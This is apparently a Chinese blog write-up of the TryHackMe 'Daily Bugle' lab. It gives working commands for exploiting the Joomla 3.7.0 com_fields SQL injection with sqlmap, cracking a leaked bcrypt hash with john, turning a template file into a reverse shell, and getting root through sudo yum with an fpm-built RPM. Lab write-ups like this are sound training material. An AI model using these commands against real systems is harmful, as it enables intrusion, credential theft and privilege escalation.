扫描打点

看到有个
mysql后面可能会用到,并且看到80端口的服务是joomlarobots.txt里面找到各个网站,就懒得扫了(逃
(当然也可以从
nmap扫描结果中看出来百度一下
joomla,发现有个工具joomscan来判断版本joomscan -u 10.10.186.85
看到是
3.7.0,去exploitdb搜一搜恰好有poc让直接拿
sqlmap硬打就行:sqlmap -u "http://10.10.186.85/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]update:
sqlmap好慢啊,去找了个专门的poc来打
拿到了用户名
jonah和加密后的密码:$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm幽默
hash_identifier没识别只能去这里对着特征找了
以
$2为开头,搜索到了这个
用
john爆一下:john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt --format=bcrypt得到密码是
spiderman123想到刚刚得到的管理员后台,直接登录
joomla后台getshell一开始想用
Install那里传马,但没传上去搜了一下找到
CVE-2021-23132去
media中的option界面,把Path to file Path改成./来进行目录遍历

到
/administrator/components/com_users下删除config.xml并重新上传,内容参考上面的网址等下这里一直上传不上去,但是通读一下
poc,这一步是为了得到SuperUser权限的用户,但我们已经是了,就跳到下一步去
templates那里,修改beez3/error.php
然后访问
templates/beez3/error.php就能有代码执行
既然这样了直接把
error.php改成反弹shell即可连接
Linux提权进去之后用户为
apache,连访问正常用户目录都不行
虽然我没有思路,但传个
msf马先啊嗯看题解,去
/var/www/html下找到configuration.php
然后要考虑密码复用的问题,即用
nv5uz9r3ZEDzVjNu试图登录root或者刚刚的jjameson
这次
sudo -l终于出东西了:
继续去
https://gtfobins.github.io/找大概是要把提权脚本用
fpm打成RPM包,传上去用有权限的yum运行打包:
fpm -n x -s dir -t rpm -a all --before-install sudo.sh .运行:
sudo yum localinstall -y x-1.0-1.noarch.rpm然后
sudo /bin/bash,提权成功
THM打靶日寄7-DailyBugle
- 本文链接: http://noone40404.github.io/2024/09/14/THM打靶日寄7:DailyBugle/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!